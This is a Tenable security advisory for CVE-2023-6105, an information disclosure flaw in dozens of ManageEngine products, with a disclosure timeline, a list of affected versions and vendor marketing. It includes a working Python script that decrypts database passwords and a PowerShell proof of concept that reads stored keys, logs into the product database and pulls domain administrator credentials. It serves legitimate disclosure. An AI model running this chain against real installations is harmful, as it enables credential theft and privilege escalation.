Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

ManageEngine Information Disclosure

Medium
← View More Research Advisories

Synopsis

An information disclosure vulnerability exists in multiple ManageEngine products that can result in encryption keys being exposed. A low-privileged OS user with access to the host where an affected ManageEngine product is installed can view and use the exposed key to decrypt product database passwords. This allows the user to access the ManageEngine product database.

 

An encryption key is stored in the "CryptTag" configuration in <PRODUCT_INSTALLATION_DIR>\conf\customer-config.xml. 

The ManageEngine product database usernames and passwords can be found in <PRODUCT_INSTALLATION_DIR>\conf\database_params.conf.

 

A database password can be decrypted with the following python script (me_decrypt.py):

 

import sys

from Crypto.Cipher import AES

from Crypto.Protocol.KDF import PBKDF2

from Crypto.Hash import SHA1

from Crypto.Util.Padding import unpad

 

data = bytearray.fromhex(sys.argv[1])

pw = sys.argv[2]

salt = data[:20]

key = PBKDF2(pw, salt, 32, 65556, None, SHA1)

cipher = AES.new(key, AES.MODE_CBC, iv=b'\x00'*16)

print(unpad(cipher.decrypt(data[20:]),16).decode())

 

'''

Usage:

me_decrypt.py <encrypted_data_in_hexstr> <key>

me_decrypt.py <password_in_database_params.conf> <CryptTag_in_customer-config.xml>

python3 me_decrypt.py 'd7910c7070b09da8598b35837122217739c728f09d05354e45f7ebbe3f027781b04d2a1c' 'rfMtKVF1cDxUc0DBov8x'

wkd4uzEHFs

'''

 

With access to the product database, an attacker can perform the following:

  • Run OS commands (i.e., via COPY ... FROM PROGRAM '<command>') with privileges of the user account running the database server. This account is usually SYSTEM or some other administrative account.
  • Modify the database to reset the password of an administrative user for the product.
  • View data contents to reveal other sensitive information.
  •  

Proof of Concept:

 

To view domain administrative credentials in ADManager Plus build 7182:

 

# Verify a low-privileged domain user (duser1) is logged in

PS C:\Program Files\ManageEngine\ADManager Plus> whoami /user /groups

 

USER INFORMATION

 

User Name SID

========= ==============================================

dw\duser1 S-1-5-21-1667561354-2975149694-3384506032-1605

GROUP INFORMATION

 

Group Name Type SID Attributes

========================================== ================ ============ ==================================================

Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group

BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group

BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group

NT AUTHORITY\REMOTE INTERACTIVE LOGON Well-known group S-1-5-14 Mandatory group, Enabled by default, Enabled group

NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group

NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group

NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group

LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group

Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group

Mandatory Label\Medium Mandatory Level Label S-1-16-8192

PS C:\Program Files\ManageEngine\ADManager Plus>

 

# Get product database username and password (encrypted)

PS C:\Program Files\ManageEngine\ADManager Plus> Select-String "(username|password)=" .\conf\database_params.conf | select -ExpandProperty line

username=admanager

password=af7638bf753b03f6eaa449be8d030589217b21d3e6ddff8adabe22aed1eebcb11f9b3b40

 

# Get ECTag (encryption key for domain passwords) and CryptTag (encryption key for DB passwords)

PS C:\Program Files\ManageEngine\ADManager Plus> Select-String "(ECTag|CryptTag)" .\conf\customer-config.xml | select -ExpandProperty line

<configuration name="ECTag" value="4e2e52c9c79f1b26dbe59981ab967a9cf3dd21cac24ec3905214be3eac828f19205a53709cce42bd082c8e821128ad751051f668"/>

<configuration name="CryptTag" value="hYC1D8l2-DgXdVVYPIZN"/>

Decrypt database password using CryptTag as key

python3 me_decrypt.py 'af7638bf753b03f6eaa449be8d030589217b21d3e6ddff8adabe22aed1eebcb11f9b3b40' 'hYC1D8l2-DgXdVVYPIZN'

4p4HvCJsRC

 

# Decrypt ECTag using CryptTag as key

python3 me_decrypt.py '4e2e52c9c79f1b26dbe59981ab967a9cf3dd21cac24ec3905214be3eac828f19205a53709cce42bd082c8e821128ad751051f668' 'hYC1D8l2-DgXdVVYPIZN'

uBXejNXJxqYn7WeL

 

# Login to the database using decrypted password

PS C:\Program Files\ManageEngine\ADManager Plus> $Env:PGPASSWORD="4p4HvCJsRC"

PS C:\Program Files\ManageEngine\ADManager Plus> .\pgsql\bin\psql.exe -h 127.0.0.1 -p 33306 -d adsm -U admanager -q

adsm=>

 

# Grab domain administrative credentials

domain passwords are decrypted by using decypted ECTag as key

adsm=> select domain_name, user_name, pgp_sym_decrypt(password,'uBXejNXJxqYn7WeL','cipher-algo=aes256') AS "password" from ADSCredentials;

domain_name | user_name | password

-------------+---------------+----------

<REDACTED> | administrator | <REDACTED>

Solution

Apply the appropriate vendor supplied patch.

Disclosure Timeline

March 27, 2023 - Tenable discloses to vendor
April 5, 2023 - Vendor acknowledges
May 11, 2023 - Tenable requests status update
May 25, 2023 - Vendor provides status update and requires disclosure deadline extension
May 29, 2023 - Tenable acknowledges request
May 30, 2023 - Tenable pushes disclosure deadline back 30 days
July 5, 2023 - Tenable requests status update
July 7, 2023 - Vendor provides status update and notes difficulties in patching due to number of affected products
July 10, 2023 - Tenable states that further extensions have been granted
July 27, 2023 - Tenable requests status update
August 4, 2023 - Vendor provides status update
September 5, 2023 - Tenable requests status update
September 5, 2023 - Vendor states that a status update has been requested from dev teams
September 25, 2023 - Vendor provides status update
November 9, 2023 - Tenable requests status update and more information regarding affected products
November 11, 2023 - Vendor acknowledges request
November 13, 2023 - Tenable reserves CVE and informs vendor of intent to publish
November 14, 2023 - Vendor provides full list of affected products and corresponding patches

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

CVE ID: CVE-2023-6105
Tenable Advisory ID: TRA-2023-35
CVSSv3 Base / Temporal Score:
5.5 / 5.1
CVSSv3 Vector:
AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Affected Products:
Service Desk Plus prior to version 14304
Asset Explorer prior to version 7004
Service Desk Plus MSP prior to version 14305
Support Center Plus prior to version 14304
Access Manager Plus prior to version 4310
PAM 360 prior to version 5700
Password Manager Pro prior to version 12300
OpManager prior to version 125632 on Windows and version 127243 on Linux
Firewall Analyser prior to version 125632 on Windows and version 127243 on Linux
Netflow Analyser prior to version 125632 on Windows and version 127243 on Linux
Network Configurations Manager prior to version 125632 on Windows and version 127243 on Linux
OpUtils prior to version 125632 on Windows and version 127243 on Linux
Creator On-Premise prior to version 2.0.0
Analytics Plus On-Premise prior to version 5300
ADSelfService Plus prior to version 6304
ADManager Plus prior to version 7210
ADAudit Plus prior to version 7251
Cloud Security Plus prior to version 4170
Data Security Plus prior to version 6126
Exchange Reporter Plus prior to version 5713
M365 Manager Plus prior to version 4539
M365 Security Plus prior to version 4539
SharePoint Manager Plus prior to version 4405
Recovery Manager Plus prior to version 6074
Log360 UEBA prior to version 4050
Endpoint Central prior to version 11.2.2322.01
Endpoint Central MSP prior to version 11.2.2322.01
Remote Monitoring and Management prior to version 10.2.11
Mobile Device Management prior to version 10.1.2204.2
Remote Access Plus prior to version 11.2.2328.01
OS Deployer prior to version 1.2.2331.1
Browser Security Plus prior to version 11.2.2328.01
Patch Manager Plus prior to version 11.2.2328.01
Vulnerability Manager Plus prior to version 11.2.2328.01
Application Control Plus prior to version 11.2.2328.01
Patch Connect Plus prior to version 90124
Device Control Plus prior to version 11.2.2328.01
Endpoint DLP Solution prior to version 11.2.2328.01
Secure Gateway Server prior to version 90091
Risk Factor:
Medium

Advisory Timeline

November 15, 2023 - Initial release
Try for free Buy now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose your subscription option:

Buy Now
Try for free Buy now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose your subscription option:

Buy Now
Try for free Buy now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose your subscription option:

Buy Now
Try for free Buy now

Try Tenable Web App Scanning

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable One Exposure Management platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Your Tenable Web App Scanning trial also includes Tenable Vulnerability Management and Tenable Lumin.

Buy Tenable Web App Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578

Buy Now

Try for free Contact sales

Try Tenable Lumin

Visualize and explore your exposure management, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable Vulnerability Management and Tenable Web App Scanning.

Buy Tenable Lumin

Contact a sales representative to see how Tenable Lumin can help you gain insight across your entire organization and manage cyber risk.

Request a demo of Tenable Security Center

Please fill out this form with your contact information.

A sales representative will contact you shortly to schedule a demo.

* Field is required

Request a demo of Tenable OT Security

Get the Operational Technology security you need.

Reduce the risk you don’t.

Request a demo of Tenable Identity Exposure

Continuously detect and respond to Active Directory attacks. No agents. No privileges.

On-prem and in the cloud.

Request a demo of Tenable Cloud Security

Exceptional unified cloud security awaits you!

We’ll show you exactly how Tenable Cloud Security helps you deliver multi-cloud asset discovery, prioritized risk assessments and automated compliance/audit reports.

See
Tenable One
in action

Exposure management for the modern attack surface.

See Tenable Attack Surface Management in action

Know the exposure of every asset on any platform.

Get a demo of Tenable Enclave Security

Please fill out the form with your contact information and a sales representative will contact you shortly to schedule a demo.

Try for free Buy now

Try Tenable Nessus Professional free

Free for 7 days

Tenable Nessus is the most comprehensive vulnerability scanner on the market today.

NEW - Tenable Nessus Expert
now available

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. Click here to Try Nessus Expert.

Fill out the form below to continue with a Nessus Pro trial.

Buy Tenable Nessus Professional

Tenable Nessus is the most comprehensive vulnerability scanner on the market today. Tenable Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Select your license

Buy a multi-year license and save.

Add support and training
Buy Now
Renew an existing license Find a reseller
Try for free Buy now

Try Tenable Nessus Expert free

Free for 7 days.

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Already have Tenable Nessus Professional?
Upgrade to Nessus Expert free for 7 days.

Buy Tenable Nessus Expert

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Select your license

Buy a multi-year license and save more.

Add support and training
Buy Now
Renew an existing license Find a reseller